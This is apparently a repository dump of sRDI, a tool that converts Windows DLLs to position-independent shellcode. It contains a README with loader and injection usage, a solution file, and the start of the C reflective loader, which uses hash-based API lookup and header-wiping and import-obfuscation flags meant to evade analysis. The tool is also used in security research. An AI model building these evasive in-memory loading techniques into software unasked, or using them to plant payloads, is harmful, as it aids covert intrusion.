2 | sRDI allows for the conversion of DLL files to position independent shellcode. It attempts to be a fully functional PE loader supporting proper section permissions, TLS callbacks, and sanity checks. It can be thought of as a shellcode PE loader strapped to a packed DLL.
3 |
4 | Functionality is accomplished via two components:
5 | - C project which compiles a PE loader implementation (RDI) to shellcode
6 | - Conversion code which attaches the DLL, RDI, and user data together with a bootstrap
7 |
8 | This project is comprised of the following elements:
9 | - **ShellcodeRDI:** Compiles shellcode for the DLL loader
10 | - **NativeLoader:** Converts DLL to shellcode if neccesarry, then injects into memory
11 | - **DotNetLoader:** C# implementation of NativeLoader
12 | - **Python\ConvertToShellcode.py:** Convert DLL to shellcode in place
13 | - **Python\EncodeBlobs.py:** Encodes compiled sRDI blobs for static embedding
14 | - **PowerShell\ConvertTo-Shellcode.ps1:** Convert DLL to shellcode in place
15 | - **FunctionTest:** Imports sRDI C function for debug testing
16 | - **TestDLL:** Example DLL that includes two exported functions for call on Load and after
17 |
18 | **The DLL does not need to be compiled with RDI, however the technique is cross compatiable.**
19 |
20 | ## Use Cases / Examples
21 | Before use, I recommend you become familiar with [Reflective DLL Injection](https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html) and it's purpose.
22 |
23 | #### Convert DLL to shellcode using python
24 | ```python
25 | from ShellcodeRDI import *
26 |
27 | dll = open("TestDLL_x86.dll", 'rb').read()
28 | shellcode = ConvertToShellcode(dll)
29 | ```
30 |
31 | #### Load DLL into memory using C# loader
32 | ```
33 | DotNetLoader.exe TestDLL_x64.dll
34 | ```
35 |
36 | #### Convert DLL with python script and load with Native EXE
37 | ```
38 | python ConvertToShellcode.py TestDLL_x64.dll
39 | NativeLoader.exe TestDLL_x64.bin
40 | ```
41 |
42 | #### Convert DLL with powershell and load with Invoke-Shellcode
43 | ```powershell
44 | Import-Module .\Invoke-Shellcode.ps1
45 | Import-Module .\ConvertTo-Shellcode.ps1
46 | Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)
47 | ```
48 |
49 | ## Flags
50 | The PE loader code uses `flags` argument to control the various options of loading logic:
51 |
52 | - `SRDI_CLEARHEADER` [0x1]: The DOS Header and DOS Stub for the target DLL are completley wiped with null bytes on load (Except for e_lfanew). This might cause issues with stock windows APIs when supplying the base address as a psuedo `HMODULE`.
53 | - `SRDI_CLEARMEMORY` [0x2]: After calling functions in the loaded module (`DllMain` and any exports), the DLL data will be cleared from memory. This is dangerous if you expect to continue executing code out of the module (Threads / `GetProcAddressR`).
54 | - `SRDI_OBFUSCATEIMPORTS` [0x4]: The order of imports in the module will be randomized before starting IAT patching. Additionally, the high 16 bits of the flag can be used to store the number of seconds to pause before processing the next import. For example, `flags | (3 << 16)` will pause 3 seconds between every import.
55 | - `SRDI_PASS_SHELLCODE_BASE` [0x8]: As opposed to passing supplied user data to the exported function, sRDI will instead pass the base address of the currently executing shellcode block. This can be useful for self-cleanup inside more advanced modules.
56 |
57 | ## Building
58 | This project is built using Visual Studio 2019 (v142) and Windows SDK 10. The python script is written using Python 3.
59 |
60 | The Python and Powershell scripts are located at:
61 | - `Python\ConvertToShellcode.py`
62 | - `PowerShell\ConvertTo-Shellcode.ps1`
63 |
64 | After building the project, the other binaries will be located at:
65 | - `bin\NativeLoader.exe`
66 | - `bin\DotNetLoader.exe`
67 | - `bin\TestDLL_.dll`
68 | - `bin\ShellcodeRDI_.bin`
69 |
70 | If you would like to update the static blobs inside any of the tools:
71 | ```
72 | > python .\lib\Python\EncodeBlobs.py -h
73 | usage: EncodeBlobs.py [-h] solution_dir
74 |
75 | sRDI Blob Encoder
76 |
77 | positional arguments:
78 | solution_dir Solution Directory
79 |
80 | optional arguments:
81 | -h, --help show this help message and exit
82 |
83 | > python lib\Python\EncodeBlobs.py C:\code\srdi
84 |
85 | [+] Updated C:\code\srdi\Native/Loader.cpp
86 | [+] Updated C:\code\srdi\DotNet/Program.cs
87 | [+] Updated C:\code\srdi\Python/ShellcodeRDI.py
88 | [+] Updated C:\code\srdi\PowerShell/ConvertTo-Shellcode.ps1
89 |
90 | ```
91 |
92 | ## Alternatives
93 | If you find my code disgusting, or just looking for an alternative memory-PE loader project, check out some of these:
94 |
95 | - https://github.com/fancycode/MemoryModule - Probably one of the cleanest PE loaders out there, great reference.
96 | - https://github.com/TheWover/donut - Want to convert .NET assemblies? Or how about JScript?
97 | - https://github.com/hasherezade/pe_to_shellcode - Generates a polymorphic PE+shellcode hybrids.
98 | - https://github.com/DarthTon/Blackbone - Large library with many memory hacking/hooking primitives.
99 |
100 | ## Credits
101 | The basis of this project is derived from ["Improved Reflective DLL Injection" from Dan Staples](https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html) which itself is derived from the original project by [Stephen Fewer](https://github.com/stephenfewer/ReflectiveDLLInjection).
102 |
103 | The project framework for compiling C code as shellcode is taken from [Mathew Graeber's reasearch "PIC_BindShell"](http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html)
104 |
--------------------------------------------------------------------------------
/ShellcodeRDI.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31410.357
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TestDLL", "TestDLL\TestDLL.vcxproj", "{558D08E4-48B4-4E5F-94E5-5783CF0557C4}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DotNet", "DotNet\DotNet.csproj", "{FD50DEE9-91AB-4449-BA55-27C71098076B}"
9 | EndProject
10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ShellcodeRDI", "ShellcodeRDI\ShellcodeRDI.vcxproj", "{6FC09BDB-365F-4691-BBD9-CB7F69C9527A}"
11 | EndProject
12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Native", "Native\Native.vcxproj", "{68293519-3053-4AB6-921F-9690E2E1487F}"
13 | ProjectSection(ProjectDependencies) = postProject
14 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A} = {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}
15 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4} = {558D08E4-48B4-4E5F-94E5-5783CF0557C4}
16 | EndProjectSection
17 | EndProject
18 | Project("{888888A0-9F3D-457C-B088-3A5042F75D52}") = "Python", "Python\Python.pyproj", "{BE642266-F34D-43C3-B6E4-EEBF8E489519}"
19 | EndProject
20 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Converters", "Converters", "{F602BD8E-D2C2-4B04-85C6-292388CF1D83}"
21 | EndProject
22 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunctionTest", "FunctionTest\FunctionTest.vcxproj", "{7E4557D4-F56B-408A-8C81-CBEE5EF25B11}"
23 | EndProject
24 | Global
25 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
26 | Debug|Win32 = Debug|Win32
27 | Debug|x64 = Debug|x64
28 | Release|Win32 = Release|Win32
29 | Release|x64 = Release|x64
30 | EndGlobalSection
31 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
32 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Debug|Win32.ActiveCfg = Debug|Win32
33 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Debug|Win32.Build.0 = Debug|Win32
34 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Debug|x64.ActiveCfg = Debug|x64
35 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Debug|x64.Build.0 = Debug|x64
36 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Release|Win32.ActiveCfg = Release|Win32
37 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Release|Win32.Build.0 = Release|Win32
38 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Release|x64.ActiveCfg = Release|x64
39 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}.Release|x64.Build.0 = Release|x64
40 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Debug|Win32.ActiveCfg = Debug|x86
41 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Debug|Win32.Build.0 = Debug|x86
42 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Debug|x64.ActiveCfg = Debug|x64
43 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Debug|x64.Build.0 = Debug|x64
44 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Release|Win32.ActiveCfg = Release|x86
45 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Release|Win32.Build.0 = Release|x86
46 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Release|x64.ActiveCfg = Release|x64
47 | {FD50DEE9-91AB-4449-BA55-27C71098076B}.Release|x64.Build.0 = Release|x64
48 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Debug|Win32.ActiveCfg = Release|Win32
49 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Debug|Win32.Build.0 = Release|Win32
50 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Debug|x64.ActiveCfg = Release|x64
51 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Debug|x64.Build.0 = Release|x64
52 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Release|Win32.ActiveCfg = Release|Win32
53 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Release|Win32.Build.0 = Release|Win32
54 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Release|x64.ActiveCfg = Release|x64
55 | {6FC09BDB-365F-4691-BBD9-CB7F69C9527A}.Release|x64.Build.0 = Release|x64
56 | {68293519-3053-4AB6-921F-9690E2E1487F}.Debug|Win32.ActiveCfg = Debug|Win32
57 | {68293519-3053-4AB6-921F-9690E2E1487F}.Debug|Win32.Build.0 = Debug|Win32
58 | {68293519-3053-4AB6-921F-9690E2E1487F}.Debug|x64.ActiveCfg = Debug|x64
59 | {68293519-3053-4AB6-921F-9690E2E1487F}.Debug|x64.Build.0 = Debug|x64
60 | {68293519-3053-4AB6-921F-9690E2E1487F}.Release|Win32.ActiveCfg = Release|Win32
61 | {68293519-3053-4AB6-921F-9690E2E1487F}.Release|Win32.Build.0 = Release|Win32
62 | {68293519-3053-4AB6-921F-9690E2E1487F}.Release|x64.ActiveCfg = Release|x64
63 | {68293519-3053-4AB6-921F-9690E2E1487F}.Release|x64.Build.0 = Release|x64
64 | {BE642266-F34D-43C3-B6E4-EEBF8E489519}.Debug|Win32.ActiveCfg = Debug|Any CPU
65 | {BE642266-F34D-43C3-B6E4-EEBF8E489519}.Debug|x64.ActiveCfg = Debug|Any CPU
66 | {BE642266-F34D-43C3-B6E4-EEBF8E489519}.Release|Win32.ActiveCfg = Release|Any CPU
67 | {BE642266-F34D-43C3-B6E4-EEBF8E489519}.Release|x64.ActiveCfg = Release|Any CPU
68 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Debug|Win32.ActiveCfg = Debug|Win32
69 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Debug|Win32.Build.0 = Debug|Win32
70 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Debug|x64.ActiveCfg = Debug|x64
71 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Debug|x64.Build.0 = Debug|x64
72 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Release|Win32.ActiveCfg = Release|Win32
73 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Release|Win32.Build.0 = Release|Win32
74 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Release|x64.ActiveCfg = Release|x64
75 | {7E4557D4-F56B-408A-8C81-CBEE5EF25B11}.Release|x64.Build.0 = Release|x64
76 | EndGlobalSection
77 | GlobalSection(SolutionProperties) = preSolution
78 | HideSolutionNode = FALSE
79 | EndGlobalSection
80 | GlobalSection(NestedProjects) = preSolution
81 | {FD50DEE9-91AB-4449-BA55-27C71098076B} = {F602BD8E-D2C2-4B04-85C6-292388CF1D83}
82 | {68293519-3053-4AB6-921F-9690E2E1487F} = {F602BD8E-D2C2-4B04-85C6-292388CF1D83}
83 | {BE642266-F34D-43C3-B6E4-EEBF8E489519} = {F602BD8E-D2C2-4B04-85C6-292388CF1D83}
84 | EndGlobalSection
85 | GlobalSection(ExtensibilityGlobals) = postSolution
86 | SolutionGuid = {3C9908F0-8E60-451C-B039-CE1FD3FFB06A}
87 | EndGlobalSection
88 | EndGlobal
89 |
--------------------------------------------------------------------------------
/ShellcodeRDI/GetProcAddressWithHash.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // This compiles to a ROR instruction
5 | // This is needed because _lrotr() is an external reference
6 | // Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
7 | #define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
8 |
9 | // Redefine PEB structures. The structure definitions in winternl.h are incomplete.
10 | typedef struct _MY_PEB_LDR_DATA {
11 | ULONG Length;
12 | BOOL Initialized;
13 | PVOID SsHandle;
14 | LIST_ENTRY InLoadOrderModuleList;
15 | LIST_ENTRY InMemoryOrderModuleList;
16 | LIST_ENTRY InInitializationOrderModuleList;
17 | } MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;
18 |
19 | typedef struct _MY_LDR_DATA_TABLE_ENTRY
20 | {
21 | LIST_ENTRY InLoadOrderLinks;
22 | LIST_ENTRY InMemoryOrderLinks;
23 | LIST_ENTRY InInitializationOrderLinks;
24 | PVOID DllBase;
25 | PVOID EntryPoint;
26 | ULONG SizeOfImage;
27 | UNICODE_STRING FullDllName;
28 | UNICODE_STRING BaseDllName;
29 | } MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;
30 |
31 | HMODULE GetProcAddressWithHash( DWORD dwModuleFunctionHash )
32 | {
33 | PPEB PebAddress;
34 | PMY_PEB_LDR_DATA pLdr;
35 | PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
36 | PVOID pModuleBase;
37 | PIMAGE_NT_HEADERS pNTHeader;
38 | DWORD dwExportDirRVA;
39 | PIMAGE_EXPORT_DIRECTORY pExportDir;
40 | PLIST_ENTRY pNextModule;
41 | DWORD dwNumFunctions;
42 | USHORT usOrdinalTableIndex;
43 | PDWORD pdwFunctionNameBase;
44 | PCSTR pFunctionName;
45 | UNICODE_STRING BaseDllName;
46 | DWORD dwModuleHash;
47 | DWORD dwFunctionHash;
48 | PCSTR pTempChar;
49 | DWORD i;
50 |
51 | #if defined(_WIN64)
52 | PebAddress = (PPEB) __readgsqword( 0x60 );
53 | #else
54 | PebAddress = (PPEB) __readfsdword( 0x30 );
55 | #endif
56 |
57 | pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
58 | pNextModule = pLdr->InLoadOrderModuleList.Flink;
59 | pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;
60 |
61 | while (pDataTableEntry->DllBase != NULL)
62 | {
63 | dwModuleHash = 0;
64 | pModuleBase = pDataTableEntry->DllBase;
65 | BaseDllName = pDataTableEntry->BaseDllName;
66 | pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
67 | dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;
68 |
69 | // Get the next loaded module entry
70 | pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;
71 |
72 | // If the current module does not export any functions, move on to the next module.
73 | if (dwExportDirRVA == 0)
74 | {
75 | continue;
76 | }
77 |
78 | // Calculate the module hash
79 | for (i = 0; i < BaseDllName.MaximumLength; i++)
80 | {
81 | pTempChar = ((PCSTR) BaseDllName.Buffer + i);
82 |
83 | dwModuleHash = ROTR32( dwModuleHash, 13 );
84 |
85 | if ( *pTempChar >= 0x61 )
86 | {
87 | dwModuleHash += *pTempChar - 0x20;
88 | }
89 | else
90 | {
91 | dwModuleHash += *pTempChar;
92 | }
93 | }
94 |
95 | pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);
96 |
97 | // We'll assume the function we are matching isn't the very first or last for safety
98 |
99 | dwNumFunctions = pExportDir->NumberOfNames - 1;
100 | pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames + (dwNumFunctions * sizeof(DWORD)));
101 |
102 | // We'll also iterate in reverse to switch things up
103 |
104 | for (i = dwNumFunctions; i > 1; i--)
105 | {
106 | dwFunctionHash = 0;
107 | pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
108 | pdwFunctionNameBase--;
109 |
110 | pTempChar = pFunctionName;
111 |
112 | do
113 | {
114 | dwFunctionHash = ROTR32( dwFunctionHash, 13 );
115 | dwFunctionHash += *pTempChar;
116 | pTempChar++;
117 | } while (*(pTempChar - 1) != 0);
118 |
119 | dwFunctionHash += dwModuleHash;
120 |
121 | if (dwFunctionHash == dwModuleFunctionHash)
122 | {
123 | usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
124 | return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
125 | }
126 | }
127 | }
128 |
129 | // All modules have been exhausted and the function was not found.
130 | return NULL;
131 | }
--------------------------------------------------------------------------------
/ShellcodeRDI/ShellcodeRDI.c:
--------------------------------------------------------------------------------
1 | #define WIN32_LEAN_AND_MEAN
2 |
3 | #pragma warning( disable : 4201 ) // Disable warning about 'nameless struct/union'
4 |
5 | #include "GetProcAddressWithHash.h"
6 |
7 | #include
8 | #include
9 | #include
10 |
11 | #define SRDI_CLEARHEADER 0x1
12 | #define SRDI_CLEARMEMORY 0x2
13 | #define SRDI_OBFUSCATEIMPORTS 0x4
14 | #define SRDI_PASS_SHELLCODE_BASE 0x8
15 |
16 | #define DEREF( name )*(UINT_PTR *)(name)
17 | #define DEREF_64( name )*(DWORD64 *)(name)
18 | #define DEREF_32( name )*(DWORD *)(name)
19 | #define DEREF_16( name )*(WORD *)(name)
20 | #define DEREF_8( name )*(BYTE *)(name)
21 |
22 | /** NOTE: module hashes are computed using all-caps unicode strings */
23 | #define KERNEL32DLL_HASH 0x6A4ABC5B
24 | #define NTDLLDLL_HASH 0x3CFA685D
25 |
26 | #define LOADLIBRARYA_HASH 0x726774c
27 | #define GETPROCADDRESS_HASH 0x7802f749
28 | #define VIRTUALALLOC_HASH 0xe553a458
29 | #define EXITTHREAD_HASH 0xa2a1de0
30 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x945cb1af
31 | #define RTLEXITUSERTHREAD_HASH 0xFF7F061A // Vista+
32 | #define GETNATIVESYSTEMINFO_HASH 0x959e0033
33 | #define VIRTUALPROTECT_HASH 0xc38ae110
34 | #define MESSAGEBOXA_HASH 0x7568345
35 | #define LOCALFREE_HASH 0xea61fcb1
36 | #define VIRTUALFREE_HASH 0x300f2f0b
37 | #define SLEEP_HASH 0xe035f044
38 | #define RTLADDFUNCTIONTABLE_HASH 0x45b82eba
39 |
40 | #define LDRLOADDLL_HASH 0xbdbf9c13
41 | #define LDRGETPROCADDRESS_HASH 0x5ed941b5
42 |
43 |
44 | #define HASH_KEY 13
45 |
46 | #ifdef _WIN64
47 | #define HOST_MACHINE IMAGE_FILE_MACHINE_AMD64
48 | #else
49 | #define HOST_MACHINE IMAGE_FILE_MACHINE_I386
50 | #endif
51 |
52 | // 100-ns period
53 | #define OBFUSCATE_IMPORT_DELAY 5 * 1000 * 10000
54 |
55 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
56 | typedef BOOL(*EXPORTFUNC)(LPVOID, DWORD);
57 |
58 | typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
59 | typedef ULONG_PTR(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
60 | typedef LPVOID(WINAPI * VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD);
61 | typedef VOID(WINAPI * EXITTHREAD)(DWORD);
62 | typedef BOOL(NTAPI * FLUSHINSTRUCTIONCACHE)(HANDLE, LPCVOID, SIZE_T);
63 | typedef VOID(WINAPI * GETNATIVESYSTEMINFO)(LPSYSTEM_INFO);
64 | typedef BOOL(WINAPI * VIRTUALPROTECT)(LPVOID, SIZE_T, DWORD, PDWORD);
65 | typedef int (WINAPI * MESSAGEBOXA)(HWND, LPSTR, LPSTR, UINT);
66 | typedef BOOL(WINAPI * VIRTUALFREE)(LPVOID, SIZE_T, DWORD);
67 | typedef BOOL(WINAPI * LOCALFREE)(LPVOID);
68 | typedef VOID(WINAPI* SLEEP)(DWORD);
69 | typedef BOOLEAN(WINAPI* RTLADDFUNCTIONTABLE)(PVOID, DWORD, DWORD64);
70 |
71 | typedef NTSTATUS(WINAPI *LDRLOADDLL)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
72 | typedef NTSTATUS(WINAPI *LDRGETPROCADDRESS)(HMODULE, PANSI_STRING, WORD, PVOID*);
73 |
74 | #pragma warning( push )
75 | #pragma warning( disable : 4214 ) // nonstandard extension
76 | typedef struct
77 | {
78 | WORD offset : 12;
79 | WORD type : 4;
80 | } IMAGE_RELOC, * PIMAGE_RELOC;
81 | #pragma warning(pop)
82 |
83 | static inline size_t
84 | AlignValueUp(size_t value, size_t alignment) {
85 | return (value + alignment - 1) & ~(alignment - 1);
86 | }
87 | static inline size_t
88 | _strlen(char* s) {
89 | size_t i;
90 | for (i = 0; s[i] != '\0'; i++);
91 | return i;
92 | }
93 |
94 | static inline size_t
95 | _wcslen(wchar_t* s) {
96 | size_t i;
97 | for (i = 0; s[i] != '\0'; i++);
98 | return i;
99 | }
100 |
101 | #define RVA(type, base, rva) (type)((ULONG_PTR) base + rva)
102 |
103 | #define FILL_STRING(string, buffer) \
104 | string.Length = (USHORT)_strlen(buffer); \
105 | string.MaximumLength = string.Length; \
106 | string.Buffer = buffer
107 |
108 | #define FILL_UNI_STRING(string, buffer) \
109 | string.Length = (USHORT)_wcslen(buffer); \
110 | string.MaximumLength = string.Length; \
111 | string.Buffer = buffer
112 |
113 | #define FILL_STRING_WITH_BUF(string, buffer) \
114 | string.Length = sizeof(buffer); \
115 | string.MaximumLength = string.Length; \
116 | string.Buffer = (PCHAR)buffer
117 |
118 | ULONG_PTR LoadDLL(PBYTE pbModule, DWORD dwFunctionHash, LPVOID lpUserData, DWORD dwUserdataLen, PVOID pvShellcodeBase, DWORD dwFlags)
119 | {
120 | #pragma warning( push )
121 | #pragma warning( disable : 4055 ) // Ignore cast warnings
122 |
123 | // Function pointers
124 |
125 | LDRLOADDLL pLdrLoadDll = NULL;
126 | LDRGETPROCADDRESS pLdrGetProcAddress = NULL;
127 |
128 | LOADLIBRARYA pLoadLibraryA = NULL;
129 | VIRTUALALLOC pVirtualAlloc = NULL;
130 | FLUSHINSTRUCTIONCACHE pFlushInstructionCache = NULL;
131 | GETNATIVESYSTEMINFO pGetNativeSystemInfo = NULL;
132 | VIRTUALPROTECT pVirtualProtect = NULL;
133 | VIRTUALFREE pVirtualFree = NULL;
134 | LOCALFREE pLocalFree = NULL;
135 | SLEEP pSleep = NULL;
136 | RTLADDFUNCTIONTABLE pRtlAddFunctionTable = NULL;
137 |
138 | //CHAR msg[2] = { 'a','\0' };
139 | //MESSAGEBOXA pMessageBoxA = NULL;
140 |
141 | // PE data
142 | PIMAGE_NT_HEADERS ntHeaders;
143 | PIMAGE_SECTION_HEADER sectionHeader;
144 | PIMAGE_DATA_DIRECTORY dataDir;
145 | PIMAGE_IMPORT_DESCRIPTOR importDesc;
146 | PIMAGE_DELAYLOAD_DESCRIPTOR delayDesc;
147 | PIMAGE_THUNK_DATA firstThunk, origFirstThunk;
148 | PIMAGE_IMPORT_BY_NAME importByName;
149 | PIMAGE_TLS_DIRECTORY tlsDir;
150 | PIMAGE_TLS_CALLBACK * callback;
151 | PIMAGE_BASE_RELOCATION relocation;
152 | PIMAGE_RELOC relocList;
153 | PIMAGE_EXPORT_DIRECTORY exportDir;
154 | #ifdef _WIN64
155 | PIMAGE_RUNTIME_FUNCTION_ENTRY rfEntry;
156 | #endif
157 | PDWORD expName;
158 | PWORD expOrdinal;
159 | LPCSTR expNameStr;
160 |
161 | // Functions
162 | DLLMAIN dllMain;
163 | EXPORTFUNC exportFunc;
164 |
165 | // Memory protections
166 | DWORD executable, readable, writeable, protect;
167 |
168 | // Counters
169 | DWORD i = 0;
170 | DWORD c = 0;
171 |
172 | // Alignment
173 | DWORD lastSectionEnd;
174 | DWORD endOfSection;
175 | DWORD alignedImageSize;
176 | ULONG_PTR baseOffset;
177 | SYSTEM_INFO sysInfo;
178 |
179 | // General
180 | DWORD funcHash;
181 | DWORD importCount;
182 | HANDLE library;
183 |
184 | // String
185 | UNICODE_STRING uString = { 0 };
186 | STRING aString = { 0 };
187 |
188 | WCHAR sKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'};
189 |
190 | // At a certain length (15ish), the compiler with screw with inline
191 | // strings declared as CHAR. No idea why, use BYTE to get around it.
192 |
193 | BYTE sSleep[] = { 'S', 'l', 'e', 'e', 'p' };
194 | BYTE sLoadLibrary[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A' };
195 | BYTE sVirtualAlloc[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c' };
196 | BYTE sVirtualProtect[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'P', 'r', 'o', 't', 'e', 'c', 't' };
197 | BYTE sFlushInstructionCache[] = { 'F', 'l', 'u', 's', 'h', 'I', 'n', 's', 't', 'r', 'u', 'c', 't', 'i', 'o', 'n', 'C', 'a', 'c', 'h', 'e' };
198 | BYTE sGetNativeSystemInfo[] = { 'G', 'e', 't', 'N', 'a', 't', 'i', 'v', 'e', 'S', 'y', 's', 't', 'e', 'm', 'I', 'n', 'f', 'o' };
199 | BYTE sRtlAddFunctionTable[] = { 'R', 't', 'l', 'A', 'd', 'd', 'F', 'u', 'n', 'c', 't', 'i', 'o', 'n', 'T', 'a', 'b', 'l', 'e' };
200 |
201 | // Import obfuscation
202 | DWORD randSeed;
203 | DWORD rand;
204 | DWORD sleep;
205 | DWORD selection;
206 | IMAGE_IMPORT_DESCRIPTOR tempDesc;
207 |
208 | // Relocated base
209 | ULONG_PTR baseAddress;
210 |
211 | // -------
212 |
213 | ///
214 | // STEP 1: locate all the required functions
215 | ///
216 |
217 | pLdrLoadDll = (LDRLOADDLL)GetProcAddressWithHash(LDRLOADDLL_HASH);
218 | pLdrGetProcAddress = (LDRGETPROCADDRESS)GetProcAddressWithHash(LDRGETPROCADDRESS_HASH);
219 |
220 | uString.Buffer = sKernel32;
221 | uString.MaximumLength = sizeof(sKernel32);
222 | uString.Length = sizeof(sKernel32);
223 |
224 | //pMessageBoxA = (MESSAGEBOXA)GetProcAddressWithHash(MESSAGEBOXA_HASH);
225 |
226 | pLdrLoadDll(NULL, 0, &uString, &library);
227 |
228 | FILL_STRING_WITH_BUF(aString, sVirtualAlloc);
229 | pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pVirtualAlloc);
230 |
231 | FILL_STRING_WITH_BUF(aString, sVirtualProtect);
232 | pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pVirtualProtect);
233 |
234 | FILL_STRING_WITH_BUF(aString, sFlushInstructionCache);
235 | pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pFlushInstructionCache);
236 |
237 | FILL_STRING_WITH_BUF(aString, sGetNativeSystemInfo);
238 | pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pGetNativeSystemInfo);
239 |
240 | FILL_STRING_WITH_BUF(aString, sSleep);
241 | pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pSleep);
242 |
243 | FILL_STRING_WITH_BUF(aString, sRtlAddFunctionTable);
244 | pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pRtlAddFunctionTable);
245 |
246 | FILL_STRING_WITH_BUF(aString, sLoadLibrary);
247 | pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pLoadLibraryA);
248 |
249 | //FILL_STRING_WITH_BUF(aString, sMessageBox);
250 | //pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pMessageBoxA);
251 |
252 | if (!pVirtualAlloc || !pVirtualProtect || !pSleep ||
253 | !pFlushInstructionCache || !pGetNativeSystemInfo) {
254 | return 0;
255 | }
256 |
257 | ///
258 | // STEP 2: load our image into a new permanent location in memory
259 | ///
260 |
261 | ntHeaders = RVA(PIMAGE_NT_HEADERS, pbModule, ((PIMAGE_DOS_HEADER)pbModule)->e_lfanew);
262 |
263 | // Perform sanity checks on the image (Stolen from https://github.com/fancycode/MemoryModule/blob/master/MemoryModule.c)
264 |
265 | if (ntHeaders->Signature != IMAGE_NT_SIGNATURE)
266 | return 0;
267 |
268 | if (ntHeaders->FileHeader.Machine != HOST_MACHINE)
269 | return 0;
270 |
271 | if (ntHeaders->OptionalHeader.SectionAlignment & 1)
272 | return 0;
273 |
274 | // Align the image to the page size (Stolen from https://github.com/fancycode/MemoryModule/blob/master/MemoryModule.c)
275 |
